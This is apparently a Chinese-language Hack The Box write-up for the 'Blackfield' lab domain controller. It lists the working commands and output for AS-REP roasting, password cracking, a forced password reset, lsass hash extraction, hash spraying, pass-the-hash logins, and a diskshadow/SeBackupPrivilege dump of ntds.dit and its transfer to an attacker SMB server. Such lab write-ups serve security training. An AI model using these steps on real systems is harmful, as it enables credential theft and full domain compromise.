端口扫描

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap --min-rate=10000 -p- 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:57 CST
Nmap scan report for 10.10.10.192
Host is up (0.079s latency).
Not shown: 65525 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman
49677/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 21.11 seconds
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo nmap -sT -sC -sV -O -p53,88,135,139,389,445,593,3268,5985 10.10.10.192
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 22:59 CST
Nmap scan report for 10.10.10.192
Host is up (0.074s latency).

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 21:48:44Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-09-19T21:49:02
|_ start_date: N/A
|_clock-skew: 6h49m18s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

添加hosts:black.local

Enum

ldap枚举不了,因为没有权限

匿名枚举共享:

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u guest
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share

有两个可读共享,连接profile$共享,发现上面是一堆空目录,并且看上去像是用户名,那么保存下来成用户字典

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ cat username|awk -F ' ' '{print $1}' >user.txt

尝试GetNPuser

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ GetNPUsers.py blackfield.local/ -usersfile user.txt -no-pass -dc-ip 10.10.10.192 -request >NPresult

在一串报错中找到了一串哈希

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ($krb5asrep$23$support@BLACKFIELD.LOCAL)
1g 0:00:00:10 DONE (2024-09-19 23:55) 0.09842g/s 1410Kp/s 1410Kc/s 1410KC/s #1WHORE..#*bebe#*
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

是support用户的密码,无法Winrm连接,再次SMB

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u support -p '#00^BlackKnight'
<SNIP>
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

连接SYSVOL共享,递归下载下来

存在一个Registry.pol,是GPO策略的注册表,但是未能利用

使用bloodhound进行攻击路径的枚举

安装

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ sudo apt install bloodhound

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ pip3 install bloodhound

其他初始设置根据:https://bloodhound.readthedocs.io/en/latest/installation/linux.html

┌──(mikannse㉿kali)-[~/HTB/blackfield/blood]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 18 computers
INFO: Found 0 trusts
INFO: Done in 00M 18S

搜寻生成了几个json文件,启动bloodhound

┌──(mikannse㉿kali)-[~/HTB/blackfield/blood]
└─$ bloodhound --no-sandbox

使用在neo4j中设置的凭证登录,然后右上角可以上传数据,并且右上角搜索support用户,会显示与之相关的节点数据

在outbound列表中发现support用户能够强制修改audit2020用户的密码

能够使用rpc来重置

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ rpcclient -U blackfield/support 10.10.10.192
Password for [BLACKFIELD\support]:
rpcclient $> setuserinfo audit2020 23 1q2w3e!

有了新的共享能够读取

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbmap -H 10.10.10.192 -u audit2020 -p '1q2w3e!'
<SNIP>
[+] IP: 10.10.10.192:445 Name: blackfield.local Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share

Pypykatz

连接forenisc共享,里面令人感兴趣的是lsass.zip,文件有些大,下载又超时了,换用impacket-smbclient,虽然也需要比较久但是起码不会超时

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ impacket-smbclient audit2020:'1q2w3e!'@10.10.10.192
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# use forensic
# cd memory_analysis
# get lsass.zip
# exit

解压之后,使用pypykatz从lsa转存中dump哈希,将用户和哈希做成字典

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ cat lsa_dump|grep NT: |cut -d " " -f2 |sort -u >hash
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ cat lsa_dump|grep Username: |sort -ru |cut -d " " -f2 |awk '$NF' >user
┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ crackmapexec smb 10.10.10.192 -u user -H hash --continue-on-success
SMB 10.10.10.192 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [-] BLACKFIELD.local\svc_backup:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d
<SNIP>

喷洒成功:svc_backup:9658d1d1dcd9250115e2205d9f48400d

┌──(mikannse㉿kali)-[~/HTB/blackfield/auditshare]
└─$ evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami
blackfield\svc_backup

提权

*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /all

USER INFORMATION
----------------

User Name SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288


PRIVILEGES INFORMATION
----------------------

Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.

发现有SeBackupPrivilege权限,能够访问任意文件

使用: https://github.com/giuliano108/SeBackupPrivilege

本想着直接查看root.txt,但是无权限,但是admin桌面上的notes.txt是可以查看

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeCmdLets.dll

Info: Uploading /home/mikannse/tools/Privesc/win/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeCmdLets.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll

Data: 16384 bytes of 16384 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload SeBackupPrivilegeUtils.dll

Info: Uploading /home/mikannse/tools/Privesc/win/SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug/SeBackupPrivilegeUtils.dll to C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll

Data: 21844 bytes of 21844 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Copy-FileSeBackupPrivilege C:\Users\Administrator\Desktop\notes.txt C:\Users\svc_backup\Desktop\notes.txt

总之内容就是说root.txt被加密了,总的来说还是得提权了。

Sebackup权限比较常用的提权路径是转存NTDS来拿到管理员的哈希,因为是域控,所以能够直接转存ntds.dit,否则就要分别转存那三件套

但是要转存ntds.dit,用reg不行,需要使用diskshadow

上传一个文本文件到机器上

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ cat cmd
set context persistent nowriters
add volume c: alias temp
create
expose %temp% h:
exit

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ unix2dos cmd
unix2dos: converting file cmd to DOS format..

需要转换一下换行符然后上传上去

*Evil-WinRM* PS C:\Users\svc_backup\Documents> upload cmd

Info: Uploading /home/mikannse/HTB/blackfield/cmd to C:\Users\svc_backup\Documents\cmd

Data: 120 bytes of 120 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc_backup\Documents> mv cmd C:\Windows\Temp
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd C:\Windows\Temp
*Evil-WinRM* PS C:\Windows\Temp> diskshadow /s cmd
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/20/2024 3:56:35 AM

-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {581f125e-ba6a-4553-a945-f2574bc04948} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} set as environment variable.

Querying all shadow copies with the shadow copy set ID {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f}

* Shadow copy ID = {581f125e-ba6a-4553-a945-f2574bc04948} %temp%
- Shadow copy set: {68e3a0ad-41ca-4044-bd06-0fbfefdc8c9f} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{6cd5140b-0000-0000-0000-602200000000}\ [C:\]
- Creation time: 9/20/2024 3:56:36 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: DC01.BLACKFIELD.local
- Service machine: DC01.BLACKFIELD.local
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %temp% h:
-> %temp% = {581f125e-ba6a-4553-a945-f2574bc04948}
The shadow copy was successfully exposed as h:\.
-> exit

需要使用到之前的dll模块

*Evil-WinRM* PS C:\Windows\Temp> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeUtils.dll
*Evil-WinRM* PS C:\Windows\Temp> Import-Module C:\Users\svc_backup\Documents\SeBackupPrivilegeCmdLets.dll
*Evil-WinRM* PS C:\Windows\Temp> Copy-FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
*Evil-WinRM* PS C:\Windows\Temp> Copy-FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite

evil-winrm下载太慢了,选择使用smb共享,在本地开启一个smb服务器

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ smbserver.py share . -smb2support
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ secretsdump.py -ntds ntds -system system LOCAL

找到admin的哈希184fb5e5178480be64824d4cd53b99ee

┌──(mikannse㉿kali)-[~/HTB/blackfield]
└─$ evil-winrm -i 10.10.10.192 -u 'administrator' -H '184fb5e5178480be64824d4cd53b99ee'
*Evil-WinRM* PS C:\Users\Administrator\desktop> whoami
blackfield\administrator

碎碎念

这房间真的NB,学到了相当多的东西。bloodhoundNB